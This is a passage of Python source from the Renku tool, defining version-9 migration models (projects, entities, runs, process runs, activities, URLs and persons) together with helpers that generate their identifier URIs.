License.\n\"\"\"Migration models V9.\"\"\"\n\nimport datetime\nimport os\nimport posixpath\nimport re\nimport uuid\nimport weakref\nfrom bisect import bisect\nfrom collections import OrderedDict\nfrom copy import copy\nfrom functools import total_ordering\nfrom pathlib import Path\nfrom typing import Type, Union\nfrom urllib.parse import quote, urljoin, urlparse\n\nimport attr\nfrom attr.validators import instance_of\nfrom marshmallow import EXCLUDE, pre_dump\n\nfrom renku.command.schema.agent import PersonSchema\nfrom renku.command.schema.annotation import AnnotationSchema\nfrom renku.command.schema.calamus import (\n DateTimeList,\n JsonLDSchema,\n Nested,\n StringList,\n Uri,\n fields,\n oa,\n prov,\n rdfs,\n renku,\n schema,\n)\nfrom renku.command.schema.project import ProjectSchema as V10ProjectSchema\nfrom renku.core import errors\nfrom renku.core.migration.migrate import SUPPORTED_PROJECT_VERSION\nfrom renku.core.migration.models import v10 as new_schema\nfrom renku.core.migration.models.refs import LinkReference\nfrom renku.core.migration.utils import (\n OLD_METADATA_PATH,\n generate_dataset_file_url,\n generate_dataset_id,\n generate_dataset_tag_id,\n generate_url_id,\n get_datasets_path,\n)\nfrom renku.core.util import yaml as yaml\nfrom renku.core.util.datetime8601 import fix_datetime, parse_date\nfrom renku.core.util.doi import extract_doi, is_doi\nfrom renku.core.util.git import get_in_submodules\nfrom renku.core.util.urls import get_host, get_slug\nfrom renku.domain_model.dataset import generate_default_name\nfrom renku.domain_model.project_context import project_context\nfrom renku.infrastructure.repository import Commit\nfrom renku.version import __version__, version_url\n\nwfprov = fields.Namespace(\"http://purl.org/wf4ever/wfprov#\")\nPROJECT_URL_PATH = \"projects\"\nRANDOM_ID_LENGTH = 4\n\n\ndef _set_entity_commit(entity, commit):\n \"\"\"Set the commit of an entity.\"\"\"\n if not entity.commit:\n revision = \"UNCOMMITTED\"\n if entity._label:\n revision = entity._label.rsplit(\"@\", maxsplit=1)[-1]\n if revision == \"UNCOMMITTED\":\n commit = commit\n elif project_context.has_context():\n commit = project_context.repository.get_commit(revision)\n entity.commit = commit\n\n\ndef _str_or_none(data):\n \"\"\"Return str representation or None.\"\"\"\n return str(data) if data is not None else data\n\n\ndef generate_project_id(name, creator):\n \"\"\"Return the id for the project based on the repository origin remote.\"\"\"\n\n # Determine the hostname for the resource URIs.\n # If RENKU_DOMAIN is set, it overrides the host from remote.\n # Default is localhost.\n host = \"localhost\"\n\n if not creator:\n raise ValueError(\"Project Creator not set\")\n\n owner = creator.email.split(\"@\")[0]\n\n if project_context.has_context():\n remote = project_context.remote\n host = remote.host or host\n owner = remote.owner or owner\n name = remote.name or name\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n if name:\n name = quote(name, safe=\"\")\n else:\n raise ValueError(\"Project name not set\")\n\n project_url = urljoin(f\"https://{host}\", posixpath.join(PROJECT_URL_PATH, owner, name))\n return project_url\n\n\n@attr.s(slots=True)\nclass Project:\n \"\"\"Represent a project.\"\"\"\n\n name = attr.ib(default=None)\n\n created = attr.ib(converter=parse_date)\n\n version = attr.ib(converter=str, default=str(SUPPORTED_PROJECT_VERSION))\n\n agent_version = attr.ib(converter=str, default=\"pre-0.11.0\")\n\n template_source = attr.ib(type=str, default=None)\n\n template_ref = attr.ib(type=str, default=None)\n\n template_id = attr.ib(type=str, default=None)\n\n template_version = attr.ib(type=str, default=None)\n\n template_metadata = attr.ib(type=str, default=\"{}\")\n\n immutable_template_files = attr.ib(factory=list)\n\n automated_update = attr.ib(converter=bool, default=True)\n\n creator = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(kw_only=True, default=None)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n def __attrs_post_init__(self):\n \"\"\"Initialize computed attributes.\"\"\"\n if not self.creator:\n old_metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n repository = project_context.repository\n if old_metadata_path.exists():\n self.creator = Person.from_commit(repository.get_previous_commit(old_metadata_path, first=True))\n else:\n # this assumes the project is being newly created\n self.creator = Person.from_repository(repository)\n\n try:\n self._id = self.project_id\n except ValueError:\n \"\"\"Fallback to old behaviour.\"\"\"\n if not self._id:\n try:\n self._id = project_context.project.id\n except ValueError:\n metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n self._id = Project.from_yaml(metadata_path)._id\n except errors.ConfigurationError:\n pass\n if not self._id:\n raise\n\n @property\n def project_id(self):\n \"\"\"Return the id for the project.\"\"\"\n return generate_project_id(name=self.name, creator=self.creator)\n\n @classmethod\n def from_yaml(cls, path):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n self = cls.from_jsonld(data=data)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return ProjectSchema().load(data)\n\n def to_yaml(self, path=None):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n from renku import __version__\n\n self.agent_version = __version__\n\n self._metadata_path = path or self._metadata_path\n data = ProjectSchema().dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n\n@attr.s(eq=False, order=False)\nclass CommitMixin:\n \"\"\"Represent a commit mixin.\"\"\"\n\n commit = attr.ib(default=None, kw_only=True)\n path = attr.ib(default=None, kw_only=True, converter=_str_or_none)\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(kw_only=True)\n _project = attr.ib(type=Project, kw_only=True, default=None)\n\n def default_id(self):\n \"\"\"Configure calculated ID.\"\"\"\n hexsha = self.commit.hexsha if self.commit else \"UNCOMMITTED\"\n return generate_file_id(hexsha=hexsha, path=self.path)\n\n @_label.default\n def default_label(self):\n \"\"\"Generate a default label.\"\"\"\n if self.commit:\n hexsha = self.commit.hexsha\n else:\n hexsha = \"UNCOMMITTED\"\n if self.path:\n path = self.path\n if project_context.has_context() and os.path.isabs(path):\n path = Path(path).relative_to(project_context.path)\n return generate_label(path, hexsha)\n return hexsha\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n if self.path and project_context.has_context():\n path = Path(self.path)\n if path.is_absolute():\n self.path = str(path.relative_to(project_context.path))\n\n # always force \"project\" to be the current project\n if project_context.has_context():\n try:\n self._project = project_context.project\n except ValueError:\n metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n self._project = Project.from_yaml(metadata_path)\n\n if not self._id:\n self._id = self.default_id()\n\n\n@attr.s(eq=False, order=False)\nclass Entity(CommitMixin):\n \"\"\"Represent a data value or item.\"\"\"\n\n _parent = attr.ib(\n default=None, kw_only=True, converter=lambda value: weakref.ref(value) if value is not None else None\n )\n\n checksum = attr.ib(default=None, kw_only=True, type=str)\n\n @classmethod\n def from_revision(cls, path, revision: Union[str, Commit] = \"HEAD\", parent=None, find_previous=True, **kwargs):\n \"\"\"Return dependency from given path and revision.\"\"\"\n repository = project_context.repository\n\n if find_previous:\n revision = repository.get_previous_commit(path, revision=revision)\n elif revision == \"HEAD\":\n revision = repository.head.commit\n else:\n assert isinstance(revision, Commit)\n\n _, commit, path = get_in_submodules(project_context.repository, revision, path)\n\n path_ = project_context.path / path\n if path != \".\" and path_.is_dir():\n entity = Collection(commit=commit, path=path, members=[], parent=parent)\n\n files_in_commit = [c.b_path for c in commit.get_changes() if not c.deleted]\n\n # update members with commits\n for member in path_.iterdir():\n if member.name == \".gitkeep\":\n continue\n\n member_path = str(member.relative_to(project_context.path))\n find_previous = True\n\n if member_path in files_in_commit:\n # we already know the newest commit, no need to look it up\n find_previous = False\n\n try:\n assert all(member_path != m.path for m in entity.members)\n\n entity.members.append(\n cls.from_revision(\n path=member_path,\n revision=commit,\n parent=entity,\n find_previous=find_previous,\n **kwargs,\n )\n )\n except errors.GitCommitNotFoundError:\n pass\n\n else:\n entity = cls(commit=commit, path=str(path), parent=parent, **kwargs)\n\n return entity\n\n @property\n def parent(self): # pragma: no cover\n \"\"\"Return the parent object.\"\"\"\n return self._parent() if self._parent is not None else None\n\n @property\n def entities(self):\n \"\"\"Yield itself.\"\"\"\n if project_context.has_context() and not self.commit and self._label and \"@UNCOMMITTED\" not in self._label:\n repository = project_context.repository\n self.commit = repository.get_commit(self._label.rsplit(\"@\", maxsplit=1)[-1])\n\n yield self\n\n\n@attr.s(eq=False, order=False)\nclass Collection(Entity):\n \"\"\"Represent a directory with files.\"\"\"\n\n members = attr.ib(kw_only=True, default=None)\n\n def __attrs_post_init__(self):\n \"\"\"Init members.\"\"\"\n super().__attrs_post_init__()\n\n if self.members is None:\n self.members = self.default_members()\n\n for member in self.members:\n member._parent = weakref.ref(self)\n\n def default_members(self):\n \"\"\"Generate default members as entities from current path.\"\"\"\n if not project_context.has_context():\n return []\n dir_path = project_context.path / self.path\n\n if not dir_path.exists():\n # likely a directory deleted in a previous commit\n return []\n\n assert dir_path.is_dir()\n\n members = []\n for path in dir_path.iterdir():\n if path.name == \".gitkeep\":\n continue # ignore empty directories in Git repository\n cls: Type = Collection if path.is_dir() else Entity\n members.append(cls(commit=self.commit, path=str(path.relative_to(project_context.path)), parent=self))\n return members\n\n @property\n def entities(self):\n \"\"\"Recursively return all files.\"\"\"\n for member in self.members:\n yield from member.entities\n\n if project_context.has_context() and not self.commit and self._label and \"@UNCOMMITTED\" not in self._label:\n repository = project_context.repository\n self.commit = repository.get_commit(self._label.rsplit(\"@\", maxsplit=1)[-1])\n\n yield self\n\n\n@attr.s(eq=False, order=False)\nclass MappedIOStream:\n \"\"\"Represents an IO stream (``stdin``, ``stdout``, ``stderr``).\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n STREAMS = [\"stdin\", \"stdout\", \"stderr\"]\n\n stream_type = attr.ib(type=str, kw_only=True)\n\n def default_id(self):\n \"\"\"Generate an id for a mapped stream.\"\"\"\n host = \"localhost\"\n if project_context.has_context():\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n return urljoin(f\"https://{host}\", posixpath.join(\"/iostreams\", self.stream_type))\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Stream mapping for stream \"{self.stream_type}\"'\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n if not self._id:\n self._id = self.default_id()\n if not self._label:\n self._label = self.default_label()\n\n\n@attr.s(eq=False, order=False)\nclass CommandParameter:\n \"\"\"Represents a parameter for an execution template.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n default_value = attr.ib(default=None, kw_only=True)\n\n description = attr.ib(default=None, kw_only=True)\n\n name: str = attr.ib(default=None, kw_only=True)\n\n position = attr.ib(default=None, type=int, kw_only=True)\n\n prefix = attr.ib(default=None, type=str, kw_only=True)\n\n @property\n def sanitized_id(self):\n \"\"\"Return ``_id`` sanitized for use in non-jsonld contexts.\"\"\"\n if \"/steps/\" in self._id:\n return \"/\".join(self._id.split(\"/\")[-4:])\n return \"/\".join(self._id.split(\"/\")[-2:])\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n raise NotImplementedError\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n raise NotImplementedError\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n if not self._label:\n self._label = self.default_label()\n if not self.name:\n self.name = self.default_name()\n\n\ndef _generate_name(base, prefix, position):\n name = get_slug(prefix.strip(\" -=\")) if prefix else base\n position = position or uuid.uuid4().hex[:RANDOM_ID_LENGTH]\n return f\"{name}-{position}\"\n\n\n@attr.s(eq=False, order=False)\nclass CommandArgument(CommandParameter):\n \"\"\"An argument to a command that is neither input nor output.\"\"\"\n\n value = attr.ib(default=None, type=str, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = uuid.uuid4().hex\n return f\"{run_id}/arguments/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Argument \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"param\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.value\n\n\n@attr.s(eq=False, order=False)\nclass CommandInput(CommandParameter):\n \"\"\"An input to a command.\"\"\"\n\n consumes = attr.ib(kw_only=True)\n\n mapped_to = attr.ib(default=None, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = uuid.uuid4().hex\n return f\"{run_id}/inputs/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Input \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"input\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.consumes.path\n\n\n@attr.s(eq=False, order=False)\nclass CommandOutput(CommandParameter):\n \"\"\"An output of a command.\"\"\"\n\n create_folder = attr.ib(default=False, kw_only=True, type=bool)\n\n produces = attr.ib(kw_only=True)\n\n mapped_to = attr.ib(default=None, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = uuid.uuid4().hex\n return f\"{run_id}/outputs/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Output \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"output\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.produces.path\n\n\n@attr.s(eq=False, order=False)\nclass RunParameter:\n \"\"\"A run parameter that is set inside the script.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n\n _label = attr.ib(default=None, kw_only=True)\n\n name = attr.ib(default=None, type=str, kw_only=True)\n\n value = attr.ib(default=None, type=str, kw_only=True)\n\n type = attr.ib(default=None, type=str, kw_only=True)\n\n\n@total_ordering\n@attr.s(eq=False, order=False)\nclass Run(CommitMixin):\n \"\"\"Represents a `renku run` execution template.\"\"\"\n\n command = attr.ib(default=None, type=str, kw_only=True)\n\n successcodes = attr.ib(kw_only=True, type=list, factory=list)\n\n subprocesses = attr.ib(kw_only=True, factory=list)\n\n arguments = attr.ib(kw_only=True, factory=list)\n\n inputs = attr.ib(kw_only=True, factory=list)\n\n outputs = attr.ib(kw_only=True, factory=list)\n\n run_parameters = attr.ib(kw_only=True, factory=list)\n\n name = attr.ib(default=None, kw_only=True, type=str)\n\n description = attr.ib(default=None, kw_only=True, type=str)\n\n keywords = attr.ib(kw_only=True, factory=list)\n\n _activity = attr.ib(kw_only=True, default=None)\n\n @staticmethod\n def generate_id(identifier=None):\n \"\"\"Generate an id for an argument.\"\"\"\n host = \"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n if not identifier:\n identifier = str(uuid.uuid4())\n\n return urljoin(f\"https://{host}\", posixpath.join(\"/runs\", quote(identifier, safe=\"\")))\n\n def __lt__(self, other):\n \"\"\"Compares two subprocesses order based on their dependencies.\"\"\"\n a_inputs = set()\n b_outputs = set()\n\n for i in other.inputs:\n entity = i.consumes\n for sub_entity in entity.entities:\n a_inputs.add(sub_entity.path)\n\n for i in self.outputs:\n entity = i.produces\n for sub_entity in entity.entities:\n b_outputs.add(sub_entity.path)\n\n return a_inputs & b_outputs\n\n def add_subprocess(self, subprocess):\n \"\"\"Adds a subprocess to this run.\"\"\"\n process_order = 0\n if self.subprocesses:\n processes = [o.process for o in self.subprocesses]\n # Get position to insert based on dependencies\n process_order = bisect(processes, subprocess)\n if process_order < len(processes):\n # adjust ids of inputs inherited from latter subprocesses\n for i in range(len(processes), process_order, -1):\n sp = self.subprocesses[i - 1]\n sp._id = sp._id.replace(f\"subprocess/{i}\", f\"subprocess/{i+1}\")\n sp.index += 1\n\n for inp in self.inputs:\n inp._id = inp._id.replace(f\"/steps/step_{i}/\", f\"/steps/step_{i+1}/\")\n for outp in self.outputs:\n outp._id = outp._id.replace(f\"/steps/step_{i}/\", f\"/steps/step_{i+1}/\")\n\n input_paths = [i.consumes.path for i in self.inputs]\n output_paths = [o.produces.path for o in self.outputs]\n\n for input_ in subprocess.inputs:\n if input_.consumes.path not in input_paths and input_.consumes.path not in output_paths:\n new_input = copy(input_)\n\n new_input._id = f\"{self._id}/steps/step_{process_order + 1}/\" f\"{new_input.sanitized_id}\"\n new_input.mapped_to = None\n\n matching_output = next((o for o in self.outputs if o.produces.path == new_input.consumes.path), None)\n\n if not matching_output:\n self.inputs.append(new_input)\n input_paths.append(new_input.consumes.path)\n\n for output in subprocess.outputs:\n if output.produces.path not in output_paths:\n new_output = copy(output)\n\n new_output._id = f\"{self._id}/steps/step_{process_order + 1}/\" f\"{new_output.sanitized_id}\"\n new_output.mapped_to = None\n self.outputs.append(new_output)\n output_paths.append(new_output.produces.path)\n\n matching_input = next((i for i in self.inputs if i.consumes.path == new_output.produces.path), None)\n if matching_input:\n self.inputs.remove(matching_input)\n input_paths.remove(matching_input.consumes.path)\n ordered_process = OrderedSubprocess(\n id=OrderedSubprocess.generate_id(self._id, process_order + 1), index=process_order + 1, process=subprocess\n )\n self.subprocesses.insert(process_order, ordered_process)\n\n\n@total_ordering\n@attr.s(eq=False, order=False)\nclass OrderedSubprocess:\n \"\"\"A subprocess with ordering.\"\"\"\n\n _id = attr.ib(kw_only=True)\n\n index = attr.ib(kw_only=True, type=int)\n\n process = attr.ib(kw_only=True)\n\n @staticmethod\n def generate_id(parent_id, index):\n \"\"\"Generate an id for an ``OrderedSubprocess``.\"\"\"\n return f\"{parent_id}/subprocess/{index}\"\n\n def __lt__(self, other):\n \"\"\"Compares two ordered subprocesses.\"\"\"\n return self.index < other.index\n\n\n@attr.s\nclass Association:\n \"\"\"Assign responsibility to an agent for an activity.\"\"\"\n\n plan = attr.ib()\n agent = attr.ib(default=None)\n\n _id = attr.ib(kw_only=True)\n\n\nclass EntityProxyMixin:\n \"\"\"Implement proxy to entity attribute.\"\"\"\n\n def __getattribute__(self, name):\n \"\"\"Proxy entity attributes.\"\"\"\n cls = object.__getattribute__(self, \"__class__\")\n names = {field.name for field in attr.fields(cls)}\n names |= set(dir(cls))\n if name in names:\n return object.__getattribute__(self, name)\n entity = object.__getattribute__(self, \"entity\")\n return getattr(entity, name)\n\n\n@attr.s(eq=False, order=False)\nclass Usage(EntityProxyMixin):\n \"\"\"Represent a dependent path.\"\"\"\n\n entity = attr.ib(kw_only=True)\n role = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n\n@attr.s(eq=False, order=False)\nclass Generation(EntityProxyMixin):\n \"\"\"Represent an act of generating a file.\"\"\"\n\n entity = attr.ib()\n\n role = attr.ib(default=None)\n\n _activity = attr.ib(\n default=None, kw_only=True, converter=lambda value: weakref.ref(value) if value is not None else None\n )\n _id = attr.ib(kw_only=True)\n\n @property\n def activity(self):\n \"\"\"Return the activity object.\"\"\"\n return self._activity() if self._activity is not None else None\n\n @_id.default\n def default_id(self):\n \"\"\"Configure calculated ID.\"\"\"\n if self.role:\n return f\"{self.activity._id}/{self.role}\"\n return f\"{self.activity._id}/tree/{quote(str(self.entity.path))}\"\n\n\n@attr.s(eq=False, order=False)\nclass Activity(CommitMixin):\n \"\"\"Represent an activity in the repository.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _message = attr.ib(kw_only=True)\n _was_informed_by = attr.ib(kw_only=True)\n\n part_of = attr.ib(default=None, kw_only=True)\n\n _collections = attr.ib(default=attr.Factory(OrderedDict), init=False, kw_only=True)\n generated = attr.ib(kw_only=True, default=None)\n\n invalidated = attr.ib(kw_only=True, default=None)\n\n influenced = attr.ib(kw_only=True)\n\n started_at_time = attr.ib(kw_only=True)\n\n ended_at_time = attr.ib(kw_only=True)\n\n agents = attr.ib(kw_only=True)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @classmethod\n def from_yaml(cls, path, commit=None):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n\n self = cls.from_jsonld(data=data, commit=commit)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data, commit=None):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, list):\n raise ValueError(data)\n\n schema = ActivitySchema\n\n if any(str(wfprov.WorkflowRun) in d[\"@type\"] for d in data):\n schema = WorkflowRunSchema\n elif any(str(wfprov.ProcessRun) in d[\"@type\"] for d in data):\n schema = ProcessRunSchema\n\n return schema(commit=commit, flattened=True).load(data)\n\n @_message.default\n def default_message(self):\n \"\"\"Generate a default message.\"\"\"\n if self.commit:\n return self.commit.message\n\n @_was_informed_by.default\n def default_was_informed_by(self):\n \"\"\"List parent actions.\"\"\"\n if self.commit:\n return [self.generate_id(parent) for parent in self.commit.parents]\n\n @started_at_time.default\n def default_started_at_time(self):\n \"\"\"Configure calculated properties.\"\"\"\n if self.commit:\n return self.commit.authored_datetime\n\n @ended_at_time.default\n def default_ended_at_time(self):\n \"\"\"Configure calculated properties.\"\"\"\n if self.commit:\n return self.commit.committed_datetime\n\n @agents.default\n def default_agents(self):\n \"\"\"Set person agent to be the author of the commit.\"\"\"\n renku_agent = SoftwareAgent(label=f\"renku {__version__}\", id=version_url)\n if self.commit:\n return [Person.from_commit(self.commit), renku_agent]\n return [renku_agent]\n\n @influenced.default\n def default_influenced(self):\n \"\"\"Calculate default values.\"\"\"\n return list(self._collections.values())\n\n\n@attr.s(eq=False, order=False)\nclass ProcessRun(Activity):\n \"\"\"A process run is a particular execution of a Process description.\"\"\"\n\n __association_cls__ = Run\n\n generated = attr.ib(kw_only=True, default=None)\n\n association = attr.ib(default=None, kw_only=True)\n\n annotations = attr.ib(kw_only=True, default=None)\n\n qualified_usage = attr.ib(kw_only=True, default=None)\n\n run_parameter = attr.ib(kw_only=True, default=None)\n\n def __attrs_post_init__(self):\n \"\"\"Calculate properties.\"\"\"\n super().__attrs_post_init__()\n repository = project_context.repository\n commit_not_set = not self.commit or self.commit.hexsha in self._id\n if commit_not_set and Path(self.path).exists():\n self.commit = repository.get_previous_commit(self.path)\n\n if self.association:\n self.association.plan._activity = weakref.ref(self)\n plan = self.association.plan\n if not plan.commit:\n if self.commit:\n plan.commit = self.commit\n\n if plan.inputs:\n for i in plan.inputs:\n _set_entity_commit(entity=i.consumes, commit=self.commit)\n if plan.outputs:\n for o in plan.outputs:\n _set_entity_commit(entity=o.produces, commit=self.commit)\n\n if self.qualified_usage and self.commit:\n usages = []\n revision = self.commit.hexsha\n for usage in self.qualified_usage:\n if not usage.commit and \"@UNCOMMITTED\" in usage._label:\n usages.append(\n Usage.from_revision(path=usage.path, role=usage.role, revision=revision, id=usage._id)\n )\n else:\n if not usage.commit:\n revision = usage._label.rsplit(\"@\", maxsplit=1)[-1]\n usage.entity.commit = repository.get_commit(revision)\n\n usages.append(usage)\n self.qualified_usage = usages\n\n @classmethod\n def generate_id(cls, commit_hexsha):\n \"\"\"Calculate action ID.\"\"\"\n host = \"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n return urljoin(\n f\"https://{host}\",\n posixpath.join(\"/activities\", f\"commit/{commit_hexsha}\"),\n )\n\n @classmethod\n def from_run(cls, run, path, commit=None, subprocess_index=None, update_commits=False):\n \"\"\"Convert a ``Run`` to a ``ProcessRun``.\"\"\"\n repository = project_context.repository\n\n if not commit:\n commit = repository.head.commit\n\n usages = []\n\n id_ = ProcessRun.generate_id(commit.hexsha)\n\n if subprocess_index is not None:\n id_ = f\"{id_}/steps/step_{subprocess_index}\"\n\n for input_ in run.inputs:\n usage_id = f\"{id_}/{input_.sanitized_id}\"\n input_path = input_.consumes.path\n entity = input_.consumes\n if update_commits:\n commit = repository.get_previous_commit(input_path, revision=commit.hexsha)\n entity = Entity.from_revision(input_path, commit)\n\n dependency = Usage(entity=entity, role=input_.sanitized_id, id=usage_id)\n\n usages.append(dependency)\n\n agent = SoftwareAgent.from_commit(commit)\n association = Association(agent=agent, id=id_ + \"/association\", plan=run)\n\n run_parameter = []\n\n for parameter in run.run_parameters:\n parameter_id = f\"{id_}/{parameter.name}\"\n run_parameter.append(RunParameter(name=parameter.name, value=parameter.value, id=parameter_id))\n\n process_run = cls(\n id=id_,\n qualified_usage=usages,\n association=association,\n commit=commit,\n path=path,\n run_parameter=run_parameter,\n )\n\n generated = []\n\n for output in run.outputs:\n entity = Entity.from_revision(output.produces.path, revision=commit, parent=output.produces.parent)\n\n generation = Generation(activity=process_run, role=output.sanitized_id, entity=entity)\n generated.append(generation)\n\n process_run.generated = generated\n\n return process_run\n\n def to_yaml(self, path=None):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n self._metadata_path = path or self._metadata_path\n data = ProcessRunSchema(flattened=True).dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n\n@attr.s(eq=False, order=False)\nclass WorkflowRun(ProcessRun):\n \"\"\"A workflow run typically contains several subprocesses.\"\"\"\n\n __association_cls__ = Run\n\n _processes = attr.ib(kw_only=True, default=attr.Factory(list))\n\n @property\n def subprocesses(self):\n \"\"\"Subprocesses of this ``WorkflowRun``.\"\"\"\n return {i: p for i, p in enumerate(self._processes)}\n\n\n@attr.s\nclass Url:\n \"\"\"Represents a schema URL reference.\"\"\"\n\n url = attr.ib(default=None, kw_only=True)\n\n url_str = attr.ib(default=None, kw_only=True)\n url_id = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n def default_id(self):\n \"\"\"Define default value for id field.\"\"\"\n return generate_url_id(url_str=self.url_str, url_id=self.url_id)\n\n def default_url(self):\n \"\"\"Define default value for url field.\"\"\"\n if self.url_str:\n return self.url_str\n elif self.url_id:\n return {\"@id\": self.url_id}\n else:\n raise NotImplementedError(\"Either url_id or url_str has to be set\")\n\n @property\n def value(self):\n \"\"\"Returns the url value as string.\"\"\"\n if self.url_str:\n return self.url_str\n elif self.url_id:\n return self.url_id\n else:\n raise NotImplementedError(\"Either url_id or url_str has to be set\")\n\n def __attrs_post_init__(self):\n \"\"\"Post-initialize attributes.\"\"\"\n if not self.url:\n self.url = self.default_url()\n elif isinstance(self.url, dict):\n if \"_id\" in self.url:\n self.url[\"@id\"] = self.url.pop(\"_id\")\n self.url_id = self.url[\"@id\"]\n elif isinstance(self.url, str):\n self.url_str = self.url\n\n if not self._id or self._id.startswith(\"_:\"):\n self._id = self.default_id()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldUrlSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldUrlSchema().dump(self)\n\n\ndef _convert_creators(value):\n \"\"\"Convert creators.\"\"\"\n if isinstance(value, dict): # compatibility with previous versions\n return [Person.from_jsonld(value)]\n\n if isinstance(value, list):\n return [Person.from_jsonld(v) for v in value]\n\n return value\n\n\nclass Person:\n \"\"\"Represent a person.\"\"\"\n\n __slots__ = (\"affiliation\", \"alternate_name\", \"email\", \"id\", \"label\", \"name\")\n\n def __init__(\n self,\n *,\n affiliation: str = None,\n alternate_name: str = None,\n email: str = None,\n id: str = None,\n label: str = None,\n name: str,\n ):\n self.validate_email(email)\n\n if id == \"mailto:None\" or not id or id.startswith(\"_:\"):\n full_identity = Person.get_full_identity(email, affiliation, name)\n id = Person.generate_id(email, full_identity, hostname=get_host(use_project_context=False))\n label = label or name\n\n self.affiliation: str = affiliation\n self.alternate_name: str = alternate_name\n self.email: str = email\n self.id: str = id\n self.label: str = label\n self.name: str = name\n\n def __eq__(self, other):\n if self is other:\n return True\n if not isinstance(other, Person):\n return False\n return self.id == other.id and self.full_identity == other.full_identity\n\n def __hash__(self):\n return hash((self.id, self.full_identity))\n\n @staticmethod\n def generate_id(email, full_identity, hostname):\n \"\"\"Generate identifier for Person.\"\"\"\n if email:\n return f\"mailto:{email}\"\n\n id = full_identity or str(uuid.uuid4().hex)\n id = quote(id, safe=\"\")\n\n # TODO: Remove hostname part once migrating to new metadata\n return f\"https://{hostname}/persons/{id}\"\n\n @staticmethod\n def validate_email(email):\n \"\"\"Check that the email is valid.\"\"\"\n if not email:\n return\n if not isinstance(email, str) or not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n raise ValueError(\"Email address is invalid.\")\n\n @classmethod\n def from_commit(cls, commit):\n \"\"\"Create an instance from a Git commit.\"\"\"\n return cls(name=commit.author.name, email=commit.author.email)\n\n @property\n def short_name(self):\n \"\"\"Gives full name in short form.\"\"\"\n names = self.name.split()\n if len(names) == 1:\n return self.name\n\n last_name = names[-1]\n initials = [name[0] for name in names]\n initials.pop()\n\n return \"{}.{}\".format(\".\".join(initials), last_name)\n\n @property\n def full_identity(self):\n \"\"\"Return name, email, and affiliation.\"\"\"\n return self.get_full_identity(self.email, self.affiliation, self.name)\n\n @staticmethod\n def get_full_identity(email, affiliation, name):\n 